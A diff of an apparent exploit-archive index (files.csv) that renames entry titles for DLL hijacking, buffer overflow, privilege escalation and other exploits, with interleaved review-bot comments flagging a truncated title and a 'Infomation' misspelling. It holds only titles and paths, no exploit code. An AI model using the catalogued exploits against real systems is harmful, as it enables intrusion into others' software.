diff --git a/files.csv b/files.csv
index b900c5841..49608aa65 100755
--- a/files.csv
+++ b/files.csv
@@ -161,7 +161,7 @@ id,file,description,date,author,platform,type,port
 165,platforms/windows/remote/165.c,"Ipswitch WS_FTP Server 4.0.2 - ALLO Remote Buffer Overflow",2004-03-23,"Hugh Mann",windows,remote,21
 166,platforms/windows/remote/166.pl,"eSignal 7.6 - STREAMQUOTE Remote Buffer Overflow",2004-03-26,VizibleSoft,windows,remote,80
 167,platforms/linux/remote/167.c,"Ethereal 0.10.0 < 0.10.2 - IGAP Overflow Remote Root Exploit",2004-03-28,"Abhisek Datta",linux,remote,0
-168,platforms/windows/remote/168.c,"RealSecure / Blackice - iss_pam1.dll Remote Overflow",2004-03-28,Sam,windows,remote,0
+168,platforms/windows/remote/168.c,"RealSecure / Blackice - 'iss_pam1.dll' Remote Overflow",2004-03-28,Sam,windows,remote,0
 169,platforms/hardware/remote/169.pl,"Multiple Cisco Products - Cisco Global Exploiter Tool",2004-03-28,blackangels,hardware,remote,0
 170,platforms/multiple/dos/170.c,"Ethereal - EIGRP Dissector TLV_IP_INT Long IP Remote Denial of Service",2004-03-26,"Rémi Denis-Courmont",multiple,dos,0
 171,platforms/linux/remote/171.c,"tcpdump - ISAKMP Identification payload Integer Overflow",2004-04-05,Rapid7,linux,remote,0
@@ -12896,67 +12896,67 @@ id,file,description,date,author,platform,type,port
 14717,platforms/php/webapps/14717.txt,"Link CMS - SQL Injection",2010-08-23,hacker@sr.gov.yu,php,webapps,0
 14718,platforms/php/webapps/14718.txt,"Joomla! Component com_zoomportfolio - SQL Injection",2010-08-23,"Chip d3 bi0s",php,webapps,0
 14720,platforms/windows/local/14720.rb,"MicroP 0.1.1.1600 - 'mppl' Buffer Overflow",2010-08-23,"James Fitts",windows,local,0
-14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - (airpcap.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
+14721,platforms/windows/local/14721.c,"Wireshark 1.2.10 - 'airpcap.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
 14722,platforms/php/webapps/14722.txt,"Joomla! 1.5 - URL Redirecting",2010-08-24,Mr.MLL,php,webapps,0
-14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
+14723,platforms/windows/local/14723.c,"Microsoft Power Point 2010 - 'pptimpconv.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
 14727,platforms/hardware/local/14727.py,"Foxit Reader 4.0 - '.pdf' Jailbreak Exploit",2010-08-24,"Jose Miguel Esparza",hardware,local,0
-14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - (plugin_dll.dll) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
-14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-24,"Nicolas Krassas",windows,local,0
+14726,platforms/windows/local/14726.c,"uTorrent 2.0.3 - 'plugin_dll.dll' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
+14728,platforms/windows/local/14728.c,"Microsoft Windows Live Email - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0
 14828,platforms/php/webapps/14828.txt,"XOOPS 2.0.14 - 'article.php' SQL Injection",2010-08-28,[]0iZy5,php,webapps,0
-14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
-14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - (hhctrl.ocx) DLL Hijacking Exploit",2010-08-24,TheLeader,windows,local,0
-14732,platforms/windows/local/14732.c,"Opera 10.61 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-24,"Nicolas Krassas",windows,local,0
-14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - wab.exe DLL Hijacking Exploit (wab32res.dll)",2010-08-24,TheLeader,windows,local,0
-14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - (dwmapi.dll) DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
-14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-24,"Glafkos Charalambous ",windows,local,0
-14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - (wab32res.dll) DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
+14730,platforms/windows/local/14730.c,"Mozilla Firefox 3.6.8 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
+14731,platforms/windows/local/14731.c,"Microsoft Windows Movie Maker 2.6.4038.0 - 'hhctrl.ocx' DLL Hijacking",2010-08-24,TheLeader,windows,local,0
+14732,platforms/windows/local/14732.c,"Opera 10.61 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Nicolas Krassas",windows,local,0
+14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL",2010-08-24,TheLeader,windows,local,0
+14734,platforms/windows/local/14734.c,"TeamViewer 5.0.8703 - 'dwmapi.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
+14735,platforms/windows/local/14735.c,"Adobe Dreamweaver CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-24,"Glafkos Charalambous ",windows,local,0
+14744,platforms/windows/local/14744.c,"Microsoft Visio 2003 - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14745,platforms/windows/local/14745.c,"Microsoft Address Book 6.00.2900.5512 - 'wab32res.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14746,platforms/windows/local/14746.c,"Microsoft Office Groove 2007 - 'mso.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14747,platforms/windows/local/14747.c,"TeamMate Audit Management Software Suite - 'mfc71enu.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
 14737,platforms/php/webapps/14737.txt,"Simple Forum PHP - Multiple Vulnerabilities",2010-08-25,arnab_s,php,webapps,0
-14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - (mfc71loc.dll) DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0
-14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - DLL Hijacking Exploit (mfc90loc.dll)",2010-08-25,diwr,windows,local,0
-14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
+14739,platforms/windows/local/14739.c,"BS.Player 2.56 build 1043 - 'mfc71loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
+14740,platforms/windows/local/14740.c,"Adobe Dreamweaver CS5 11.0 build 4909 - 'mfc90loc.dll' DLL Hijacking",2010-08-25,diwr,windows,local,0
+14741,platforms/windows/local/14741.c,"Adobe Photoshop CS2 - 'Wintab32.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
 14742,platforms/php/webapps/14742.txt,"ClanSphere 2010 - Multiple Vulnerabilities",2010-08-25,Sweet,php,webapps,0
-14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - (mfc90loc.dll) License Files DLL Hijacking Exploit",2010-08-25,diwr,windows,local,0
+14743,platforms/windows/local/14743.c,"Avast! 5.0.594 - 'mfc90loc.dll' License Files DLL Hijacking",2010-08-25,diwr,windows,local,0
 14748,platforms/windows/local/14748.txt,"uTorrent - DLL Hijacking",2010-08-25,Dr_IDE,windows,local,0
-14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking Exploit",2010-08-25,Secfence,windows,local,0
+14750,platforms/windows/local/14750.txt,"VideoLAN VLC Media Player - 'wintab32.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
 14751,platforms/windows/local/14751.txt,"Microsoft Vista - (fveapi.dll) BitLocker Drive Encryption API Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14756,platforms/windows/local/14756.c,"Safari 5.0.1 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,Secfence,windows,local,0
-14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
-14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - (wpcap.dll) DLL Hijacking Exploit",2010-08-25,anonymous,windows,local,0
-14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking Exploit",2010-08-25,"Beenu Arora",windows,local,0
+14752,platforms/windows/local/14752.c,"Roxio Photosuite 9 - 'homeutils9.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14756,platforms/windows/local/14756.c,"Safari 5.0.1 - 'dwmapi.dll' DLL Hijacking",2010-08-25,Secfence,windows,local,0
+14753,platforms/windows/local/14753.c,"InterVideo WinDVD 5 - 'cpqdvd.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14754,platforms/windows/local/14754.txt,"Microsoft Internet Connection Signup Wizard - 'smmscrpt.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
+14755,platforms/windows/local/14755.c,"Adobe Device Central CS5 - 'qtcf.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14762,platforms/windows/local/14762.c,"Ettercap NG-0.7.3 - 'wpcap.dll' DLL Hijacking",2010-08-25,anonymous,windows,local,0
+14758,platforms/windows/local/14758.c,"Microsoft Group Convertor - 'imm.dll' DLL Hijacking",2010-08-25,"Beenu Arora",windows,local,0
 14761,platforms/multiple/dos/14761.txt,"Adobe Acrobat Reader < 9.x - Memory Corruption",2010-08-25,ITSecTeam,multiple,dos,0
-14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking Exploit",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
-14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - DLL Hijacking Exploit (iacenc.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
-14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - (wab32.dll) DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14764,platforms/windows/local/14764.c,"TechSmith Snagit 10 (Build 788) - 'dwmapi.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
+14765,platforms/windows/local/14765.c,"MediaPlayer Classic 1.3.2189.0 - 'iacenc.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
+14766,platforms/windows/local/14766.c,"Skype 4.2.0.169 - 'wab32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
 14767,platforms/windows/dos/14767.txt,"Flash Movie Player 1.5 - File Magic Denial of Service",2010-08-25,"Matthew Bergin",windows,dos,0
-14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
-14769,platforms/windows/local/14769.c,"Nvidia Driver - DLL Hijacking Exploit (nview.dll)",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
-14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
-14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - (wintab32.dll) DLL Hijacking Exploit",2010-08-25,CCNA,windows,local,0
-14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking Exploit",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14768,platforms/windows/local/14768.c,"Roxio Creator DE - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14769,platforms/windows/local/14769.c,"Nvidia Driver - 'nview.dll' DLL Hijacking",2010-08-25,"Encrypt3d.M!nd ",windows,local,0
+14771,platforms/windows/local/14771.c,"Adobe Premier Pro CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14772,platforms/windows/local/14772.c,"Adobe On Location CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14773,platforms/windows/local/14773.c,"Adobe Illustrator CS4 - 'aires.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
+14774,platforms/windows/local/14774.c,"Cisco Packet Tracer 5.2 - 'wintab32.dll' DLL Hijacking",2010-08-25,CCNA,windows,local,0
+14775,platforms/windows/local/14775.c,"Adobe InDesign CS4 - 'ibfs32.dll' DLL Hijacking",2010-08-25,"Glafkos Charalambous ",windows,local,0
 14779,platforms/windows/remote/14779.pl,"Deepin TFTP Server 1.25 - Directory Traversal",2010-08-25,demonalex,windows,remote,0
-14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
-14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking Exploit",2010-08-25,ALPdaemon,windows,local,0
-14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
-14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking Exploit",2010-08-25,storm,windows,local,0
-14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,h4ck3r#47,windows,local,0
-14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0
-14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - DLL Hijacking Exploit (dwmapi.dll)",2010-08-25,LiquidWorm,windows,local,0
-14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
-14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - DLL Hijacking Exploit (crlrib.dll)",2010-08-25,LiquidWorm,windows,local,0
-14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - (iacenc.dll) DLL Hijacking Exploit",2010-08-25,LiquidWorm,windows,local,0
-14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - DLL Hijacking Exploit (wnaspi32.dll)",2010-08-25,LiquidWorm,windows,local,0
-14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - DLL Hijacking Exploit (quserex.dll)",2010-08-25,LiquidWorm,windows,local,0
-14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking Exploit",2010-08-25,"Mohamed Clay",windows,local,0
+14778,platforms/windows/local/14778.c,"Microsoft Windows Contacts - 'wab32res.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14780,platforms/windows/local/14780.c,"Microsoft Windows Internet Communication Settings - 'schannel.dll' DLL Hijacking",2010-08-25,ALPdaemon,windows,local,0
+14781,platforms/windows/local/14781.c,"Roxio MyDVD 9 - 'HomeUtils9.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14782,platforms/windows/local/14782.c,"Microsoft PowerPoint 2007 - 'rpawinet.dll' DLL Hijacking",2010-08-25,storm,windows,local,0
+14783,platforms/windows/local/14783.c,"Mozilla Thunderbird - 'dwmapi.dll' DLL Hijacking",2010-08-25,h4ck3r#47,windows,local,0
+14784,platforms/windows/local/14784.c,"Adobe Extension Manager CS5 5.0.298 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14785,platforms/windows/local/14785.c,"Adobe ExtendedScript Toolkit CS5 3.5.0.52 - 'dwmapi.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14786,platforms/windows/local/14786.c,"CorelDRAW X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14787,platforms/windows/local/14787.c,"Corel PHOTO-PAINT X3 13.0.0.576 - 'crlrib.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14788,platforms/windows/local/14788.c,"Media Player Classic 6.4.9.1 - 'iacenc.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14789,platforms/windows/local/14789.c,"Nullsoft Winamp 5.581 - 'wnaspi32.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14790,platforms/windows/local/14790.c,"Google Earth 5.1.3535.3218 - 'quserex.dll' DLL Hijacking",2010-08-25,LiquidWorm,windows,local,0
+14791,platforms/windows/local/14791.c,"Daemon Tools Lite - 'mfc80loc.dll' DLL Hijacking",2010-08-25,"Mohamed Clay",windows,local,0
 14818,platforms/linux/remote/14818.pl,"McAfee LinuxShield 1.5.1 - Local/Remote File Inclusion (Root Remote Code Execution)",2010-08-27,"Nikolas Sotiriu",linux,remote,0
-14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking Exploit",2010-08-25,"xsploited security",windows,local,0
+14793,platforms/windows/local/14793.c,"Autodesk AutoCAD 2007 - 'color.dll' DLL Hijacking",2010-08-25,"xsploited security",windows,local,0
 14817,platforms/php/webapps/14817.txt,"Esvon Classifieds 4.0 - Multiple Vulnerabilities",2010-08-27,Sn!pEr.S!Te,php,webapps,0
 14795,platforms/bsd_x86/shellcode/14795.c,"BSD/x86 - bindshell on port 2525 Shellcode (167 bytes)",2010-08-25,beosroot,bsd_x86,shellcode,0
 14806,platforms/php/webapps/14806.txt,"Prometeo 1.0.65 - SQL Injection",2010-08-26,"Lord Tittis3000",php,webapps,0
@@ -27786,7 +27786,7 @@ id,file,description,date,author,platform,type,port
 30762,platforms/php/webapps/30762.txt,"WordPress Plugin WP-SlimStat 0.9.2 - Cross-Site Scripting",2007-11-13,"Fracesco Vaj",php,webapps,0
 30763,platforms/linux/dos/30763.php,"KDE Konqueror 3.5.6 - Cookie Handling Denial of Service",2007-11-14,"laurent gaffie",linux,dos,0
 30764,platforms/php/webapps/30764.txt,"CONTENTCustomizer 3.1 - Dialog.php Unauthorized Access",2007-11-14,d3hydr8,php,webapps,0
-40602,platforms/windows/dos/40602.html,"Microsoft Edge - Array.map Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40602,platforms/windows/dos/40602.html,"Microsoft Edge - 'Array.map' Heap Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30766,platforms/linux/dos/30766.c,"GNU TAR 1.15.91 / CPIO 2.5.90 - safer_name_suffix Remote Denial of Service",2007-11-14,"Dmitry V. Levin",linux,dos,0
 30767,platforms/windows/dos/30767.html,"Apple Safari 3.0.x - for Windows Document.Location.Hash Buffer Overflow",2007-06-25,"Azizov E",windows,dos,0
 30768,platforms/multiple/remote/30768.txt,"IBM Websphere Application Server 5.1.1 - WebContainer HTTP Request Header Security",2007-11-15,anonymous,multiple,remote,0
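Review bot: The rewritten title for 14733 drops the vulnerability class: `+14733,platforms/windows/local/14733.c,"Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL",...` ends in a bare `DLL`, whereas every sibling line in this hunk was normalized to `'<lib>' DLL Hijacking`; it should read `"Microsoft Windows 7 - 'wab32res.dll' wab.exe DLL Hijacking"`. The 14751 context line (`Microsoft Vista - (fveapi.dll) BitLocker Drive Encryption API Hijacking Exploit`) still carries the old parenthesised form and the `Exploit` suffix, so the normalization this hunk performs is incomplete within its own range. Both points are index text only; no exploit content is affected.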
@@ -27794,7 +27794,7 @@ id,file,description,date,author,platform,type,port
 30770,platforms/cgi/webapps/30770.txt,"AIDA Web - Frame.HTML Multiple Unauthorized Access Vulnerabilities",2007-11-14,"MC Iglo",cgi,webapps,0
 30771,platforms/multiple/remote/30771.txt,"Aruba MC-800 Mobility Controller - Screens Directory HTML Injection",2007-11-15,"Jan Fry",multiple,remote,0
 30772,platforms/windows/remote/30772.html,"ComponentOne FlexGrid 7.1 - ActiveX Control Multiple Buffer Overflow Vulnerabilities",2007-11-15,"Elazar Broad",windows,remote,0
-40604,platforms/windows/dos/40604.html,"Microsoft Edge - Array.join Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40604,platforms/windows/dos/40604.html,"Microsoft Edge - 'Array.join' Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 30774,platforms/php/webapps/30774.txt,"Liferay Portal 4.1 Login Script - Cross-Site Scripting",2007-11-16,"Adrian Pastor",php,webapps,0
 30775,platforms/asp/webapps/30775.txt,"JiRo's Banner System 2.0 - 'login.asp' Multiple SQL Injection",2007-11-17,"Aria-Security Team",asp,webapps,0
 30776,platforms/linux/dos/30776.txt,"LIVE555 Media Server 2007.11.1 - ParseRTSPRequestString Remote Denial Of Service",2007-11-19,"Luigi Auriemma",linux,dos,0
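Review bot: The new 40604 description introduces a misspelling — `'Array.join' Infomation Leak` — where the removed line had `Info Leak`; the intended word is `Information Leak`. The same `Info` → `Infomation` expansion appears on the 40355 and 40603 lines elsewhere in this commit, so a single search for `Infomation` across files.csv would catch all of them.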
@@ -28252,7 +28252,7 @@ id,file,description,date,author,platform,type,port
 31282,platforms/php/webapps/31282.txt,"XOOPS Tiny Event 1.01 - 'print' Option SQL Injection",2008-02-21,S@BUN,php,webapps,0
 31283,platforms/php/webapps/31283.txt,"PHP-Nuke Downloads Module - 'sid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
 31284,platforms/php/webapps/31284.txt,"XOOPS 'prayerlist' Module - 'cid' Parameter SQL Injection",2008-02-21,S@BUN,php,webapps,0
-40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Info Leak",2016-09-08,"Google Security Research",multiple,dos,0
+40355,platforms/multiple/dos/40355.txt,"Adobe Flash - Transform.colorTranform Getter Infomation Leak",2016-09-08,"Google Security Research",multiple,dos,0
 31285,platforms/multiple/dos/31285.txt,"Zilab Chat and Instant Messaging (ZIM) 2.0/2.1 Server - Multiple Vulnerabilities",2008-02-21,"Luigi Auriemma",multiple,dos,0
 31286,platforms/asp/webapps/31286.txt,"Citrix Metaframe Web Manager - 'login.asp' Cross-Site Scripting",2008-02-22,Handrix,asp,webapps,0
 31287,platforms/php/webapps/31287.txt,"PHP-Nuke Recipe Module 1.3 - 'recipeid' Parameter SQL Injection",2008-02-23,S@BUN,php,webapps,0
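Review bot: The added 40355 line replaces `Info Leak` with the misspelled `Infomation Leak`; it should be `Information Leak`. While touching this line, `Transform.colorTranform` also looks like it is missing an `s` (the Flash member appears to be `colorTransform`), but that spelling is carried over unchanged from the removed line rather than introduced here, so treat it as a separate, lower-priority fix.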
@@ -36677,9 +36677,9 @@ id,file,description,date,author,platform,type,port
 40569,platforms/java/webapps/40569.txt,"ManageEngine ServiceDesk Plus 9.2 Build 9207 - Unauthorized Information Disclosure",2016-10-18,p0z,java,webapps,0
 40570,platforms/osx/dos/40570.py,"The Unarchiver 3.11.1 - '.tar.Z' Crash PoC",2016-10-18,"Antonio Z.",osx,dos,0
 40571,platforms/cgi/webapps/40571.pl,"Cgiemail 1.6 - Source Code Disclosure",2016-10-18,"Finbar Crago",cgi,webapps,80
-40572,platforms/windows/local/40572.cs,"Windows DFS Client Driver - Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
-40573,platforms/windows/local/40573.cs,"Windows DeviceApi CMApi - PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
-40574,platforms/windows/local/40574.cs,"Windows DeviceApi CMApi - User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
+40572,platforms/windows/local/40572.cs,"Microsoft Windows - DFS Client Driver Arbitrary Drive Mapping Privilege Escalation (MS16-123)",2016-10-18,"Google Security Research",windows,local,0
+40573,platforms/windows/local/40573.cs,"Microsoft Windows - DeviceApi CMApi PiCMOpenDeviceKey Arbitrary Registry Key Write Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
+40574,platforms/windows/local/40574.cs,"Microsoft Windows - DeviceApi CMApi User Hive Impersonation Privilege Escalation (MS16-124)",2016-10-18,"Google Security Research",windows,local,0
 40576,platforms/php/webapps/40576.py,"XhP CMS 0.5.1 - Cross-Site Request Forgery / Persistent Cross-Site Scripting",2016-10-19,"Ahsan Tahir",php,webapps,0
 40577,platforms/windows/local/40577.txt,"IObit Advanced SystemCare 10.0.2 - Unquoted Service Path Privilege Escalation",2016-10-19,Amir.ght,windows,local,0
 40578,platforms/windows/local/40578.py,"HikVision Security Systems - Activex Buffer Overflow",2016-10-19,"Yuriy Gurkin",windows,local,0
@@ -36702,14 +36702,21 @@ id,file,description,date,author,platform,type,port
 40595,platforms/php/webapps/40595.txt,"SPIP 3.1.2 Template Compiler/Composer - PHP Code Execution",2016-10-20,Sysdream,php,webapps,80
 40596,platforms/php/webapps/40596.txt,"SPIP 3.1.1 / 3.1.2 - File Enumeration / Path Traversal",2016-10-20,Sysdream,php,webapps,80
 40597,platforms/php/webapps/40597.txt,"SPIP 3.1.2 - Cross-Site Request Forgery",2016-10-20,Sysdream,php,webapps,80
-40598,platforms/windows/dos/40598.txt,"Windows win32k.sys - TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
-40599,platforms/windows/dos/40599.txt,"Windows win32k.sys - TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
-40600,platforms/windows/dos/40600.txt,"Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
-40601,platforms/windows/dos/40601.txt,"Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
-40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Info Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
+40598,platforms/windows/dos/40598.txt,"Microsoft Windows - 'win32k.sys' TTF Processing RCVT TrueType Instruction Handler Out-of-Bounds Read (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
+40599,platforms/windows/dos/40599.txt,"Microsoft Windows - 'win32k.sys' TTF Processing win32k!sbit_Embolden / win32k!ttfdCloseFontContext Use-After-Free (MS16-120)",2016-10-20,"Google Security Research",windows,dos,0
+40600,platforms/windows/dos/40600.txt,"Microsoft Windows Kernel - Registry Hive Loading Negative RtlMoveMemory Size in nt!CmpCheckValueList (MS16-124)",2016-10-20,"Google Security Research",windows,dos,0
+40601,platforms/windows/dos/40601.txt,"Microsoft Windows Kernel - Registry Hive Loading Relative Arbitrary Read in nt!RtlValidRelativeSecurityDescriptor (MS16-123)",2016-10-20,"Google Security Research",windows,dos,0
+40603,platforms/windows/dos/40603.html,"Microsoft Edge - Function.apply Infomation Leak (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
 40605,platforms/windows/dos/40605.html,"Microsoft Edge - Spread Operator Stack Overflow (MS16-119)",2016-10-20,"Google Security Research",windows,dos,0
-40606,platforms/windows/local/40606.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
-40607,platforms/windows/local/40607.cpp,"Windows Edge/IE - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
+40606,platforms/windows/local/40606.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure DACL Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
+40607,platforms/windows/local/40607.cpp,"Microsoft Windows Edge/Internet Explorer - Isolated Private Namespace Insecure Boundary Descriptor Privilege Escalation (MS16-118)",2016-10-20,"Google Security Research",windows,local,0
